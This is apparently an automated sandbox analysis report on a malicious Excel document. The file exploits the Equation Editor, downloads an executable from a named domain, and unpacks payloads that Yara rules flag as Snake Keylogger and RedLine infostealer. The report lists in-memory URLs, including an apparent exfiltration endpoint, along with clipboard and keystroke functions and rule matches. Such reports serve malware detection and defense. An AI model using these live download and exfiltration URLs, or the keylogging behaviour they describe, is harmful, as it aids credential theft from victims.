Source: RegSvcs.exe, 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.888283169.0000000005B20000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.888289461.0000000005A40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.888283169.0000000005B20000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.888289461.0000000005A40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: RegSvcs.exe, 00000009.00000002.887723750.0000000002458000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.0000000002528000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: RegSvcs.exe, 00000009.00000002.887723750.000000000239A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.0000000002462000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: EQNEDT32.EXE, 00000002.00000003.526417075.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.526541779.00000000005B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://baitalasma.com/
Source: EQNEDT32.EXE, 00000002.00000002.526541779.000000000057F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526417075.000000000057F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://baitalasma.com/T7643
Source: EQNEDT32.EXE, 00000002.00000002.526524695.000000000053F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.526541779.000000000057F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526417075.000000000057F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://baitalasma.com/T76434567000.exe
Source: EQNEDT32.EXE, 00000002.00000002.526541779.000000000057F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526417075.000000000057F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://baitalasma.com/T76434567000.exeate
Source: EQNEDT32.EXE, 00000002.00000002.526524695.000000000053F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://baitalasma.com/T76434567000.exeqqC:
Source: EQNEDT32.EXE, 00000002.00000002.526524695.000000000053F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://baitalasma.com/T76434567000.exe~x
Source: RegSvcs.exe, 00000009.00000002.887723750.0000000002479000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887723750.0000000002436000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.0000000002507000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.000000000254A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: RegSvcs.exe, 00000009.00000002.887723750.0000000002436000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.0000000002507000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RegSvcs.exe, 0000000C.00000002.887712847.000000000254A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/81.181.54.104
Source: RegSvcs.exe, 00000009.00000002.887723750.0000000002479000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.000000000254A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/81.181.54.1044
Source: RegSvcs.exe, 00000009.00000002.887723750.000000000239A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887723750.00000000024C5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.000000000259A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.0000000002462000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://scratchdreams.tk
Source: RegSvcs.exe, 00000009.00000002.887723750.00000000024C5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.000000000259A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://scratchdreams.tk/_send_.php?TS
Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown	Network traffic detected: HTTP traffic on port 49164 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49164
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown	Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49166 -> 443

Source: unknown

HTTPS traffic detected: 38.242.255.115:443 -> 192.168.2.22:49164 version: TLS 1.2

Contains functionality for read data from the clipboard

Source: C:\Users\user\AppData\Roaming\negrett.exe

5_2_00B8EAFF

Contains functionality to modify clipboard data

Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B8ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,	5_2_00B8ED6A
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0106ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,	8_2_0106ED6A
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013AED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,	11_2_013AED6A

Contains functionality to read the clipboard data

Source: C:\Users\user\AppData\Roaming\negrett.exe

5_2_00B8EAFF

Contains functionality to retrieve information about pressed keystrokes

Source: C:\Users\user\AppData\Roaming\negrett.exe

Code function: 5_2_00B7AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,

5_2_00B7AA57

Potential key logger detected (key state polling based)

Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01089576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		8_2_01089576
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013C9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		11_2_013C9576

System Summary

Malicious sample detected (through community Yara rule)

Source: sheet1.xml, type: SAMPLE	Matched rule: detects AutoLoad documents using LegacyDrawing Author: ditekSHen
Source: 11.2.name.exe.560000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 12.2.RegSvcs.exe.6a5f26.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.RegSvcs.exe.6a5f26.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.RegSvcs.exe.6a5f26.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.RegSvcs.exe.6a5f26.0.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 9.2.RegSvcs.exe.820000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.RegSvcs.exe.3416458.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.RegSvcs.exe.3416458.5.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.RegSvcs.exe.3416458.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.RegSvcs.exe.3416458.5.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 9.2.RegSvcs.exe.820000.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.RegSvcs.exe.820000.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.RegSvcs.exe.820000.2.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 12.2.RegSvcs.exe.c30000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.RegSvcs.exe.c30000.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.RegSvcs.exe.c30000.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.RegSvcs.exe.c30000.2.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 12.2.RegSvcs.exe.6a503e.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.RegSvcs.exe.6a503e.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.RegSvcs.exe.6a503e.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.RegSvcs.exe.6a503e.1.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 12.2.RegSvcs.exe.3415570.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.RegSvcs.exe.3415570.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.RegSvcs.exe.3415570.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.RegSvcs.exe.3415570.4.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 12.2.RegSvcs.exe.344d370.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.RegSvcs.exe.344d370.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.RegSvcs.exe.344d370.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.RegSvcs.exe.344d370.3.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 8.2.name.exe.7d0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 9.2.RegSvcs.exe.820ee8.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.RegSvcs.exe.820ee8.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.RegSvcs.exe.820ee8.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.RegSvcs.exe.820ee8.1.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
